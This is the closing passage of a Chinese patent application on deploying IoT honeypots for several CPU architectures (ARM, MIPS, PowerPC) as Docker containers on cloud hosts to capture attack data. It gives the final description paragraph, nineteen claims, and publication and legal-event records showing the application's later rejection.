The cloud-based deployment method expands the capture range of existing honeypots, realizes an elastic and dynamic way of managing a honeypot cluster, and, combined with the cloud big data analysis service, can deeply mine the value of the honeypot data; the characteristics of containers reduce the cost of deploying and maintaining honeypots and save time, so that the user can concentrate on analyzing the attack behavior data. Moreover, the high-interaction IoT honeypot based on the cloud and on containers solves the problems that existing honeypots cannot detect attacks on Internet of Things devices, cannot be deployed at multiple points across the whole network, and have high operation and maintenance labor costs.
Although the embodiments disclosed in the present application are described above, the descriptions are only for the convenience of understanding the present application, and are not intended to limit the present application. It will be understood by those skilled in the art that various changes in form and details may be made therein without departing from the spirit and scope of the disclosure as defined by the appended claims.

Claims (19)

1. A method of implementing attack processing, comprising:
pulling a stored honeypot image from a honeypot image cloud repository, wherein the honeypot image is a honeypot structure supporting multiple CPU architectures;
creating a container on a cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
and capturing attack data through the honeypots supporting different CPU architectures.
2. The method of claim 1, further comprising: analyzing the attack data captured by the honeypots using cloud data analysis.
3. The method of claim 1 or 2, wherein the capturing of data by the honeypots comprises any combination of:
capturing a record of an attacker accessing a service;
capturing and parsing network packets, and obtaining the honeypot's network connection behavior after the attacker has broken into the honeypot from the parsed network information of the attacker;
and monitoring malicious files and obtaining information about the malicious files.
4. The method of claim 1, further comprising, when a new container needs to be deployed:
pulling the honeypot image from the honeypot image cloud repository and starting it quickly.
5. The method of claim 1 or 4, wherein pulling the honeypot image comprises:
deploying a container client on the cloud host;
and obtaining the honeypot image from the honeypot image cloud repository using the container client.
6. The method of claim 5, wherein the container client comprises the open source container engine Docker.
7. The method of claim 1 or 2, further comprising, after the method: controlling honeypots of different CPU architectures to be mounted on different cloud hosts.
8. The method of claim 7, further comprising:
packaging the network architecture information of the honeypots of different CPU architectures mounted on different cloud hosts into a visual form for display;
and packaging the results of the cloud data analysis into a visual form for display.
9. The method of claim 1, wherein the multiple CPU architectures comprise any combination of: the Advanced RISC Machine (ARM) architecture, the Microprocessor without Interlocked Pipeline Stages (MIPS) architecture, and the PowerPC (Performance Optimization With Enhanced RISC - Performance Computing) architecture.
10. A honeypot deployment method, comprising:
creating a honeypot image of a honeypot structure supporting multiple CPU architectures;
and synchronizing the created honeypot image to a honeypot image cloud repository for storage.
11. The honeypot deployment method of claim 10, further comprising: pulling the honeypot image, and creating a container on a cloud host, wherein the container corresponds to honeypots supporting different CPU architectures;
and capturing attack data through the honeypots supporting different CPU architectures.
12. The honeypot deployment method of claim 10 or 11, further comprising, after the method: controlling the honeypots of different CPU architectures to be mounted on different cloud hosts.
13. The honeypot deployment method of claim 10, further comprising, when a new container needs to be deployed:
pulling the honeypot image from the honeypot image cloud repository and starting it quickly.
14. The honeypot deployment method of claim 10 or 13, wherein pulling the honeypot image comprises:
deploying a container client on the cloud host;
and obtaining the honeypot image from the honeypot image cloud repository using the container client.
15. The honeypot deployment method of claim 14, wherein the container client comprises the open source container engine Docker.
16. The honeypot deployment method of claim 10 or 11, further comprising:
packaging the network architecture information of the honeypots of different CPU architectures that are controlled to be mounted on different cloud hosts into a visual form for display;
and packaging the results of the cloud data analysis into a visual form for display.
17. The honeypot deployment method of claim 10, wherein the multiple CPU architectures comprise any combination of: the Advanced RISC Machine (ARM) architecture, the Microprocessor without Interlocked Pipeline Stages (MIPS) architecture, and the PowerPC (Performance Optimization With Enhanced RISC - Performance Computing) architecture.
18. A computer-readable storage medium storing computer-executable instructions for performing the method of implementing attack processing of any one of claims 1 to 9 and/or the honeypot deployment method of any one of claims 10 to 17.
19. An apparatus for implementing attack processing, comprising a memory and a processor, wherein the memory stores a computer program that, when run on the processor, performs the steps of the method of implementing attack processing according to any one of claims 1 to 9 and/or of the honeypot deployment method according to any one of claims 10 to 17.
CN201811012513.9A 2018-08-31 2018-08-31 Method for realizing attack processing, honeypot deployment method, honeypot deployment medium and honeypot deployment device Pending CN110875904A (en)

Publications (1)

Publication Number Publication Date
CN110875904A true CN110875904A (en) 2020-03-10



Legal Events

Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
REG Reference to a national code (Ref country code: HK; Ref legal event code: DE; Ref document number: 40025331; Country of ref document: HK)
RJ01 Rejection of invention patent application after publication (Application publication date: 20200310)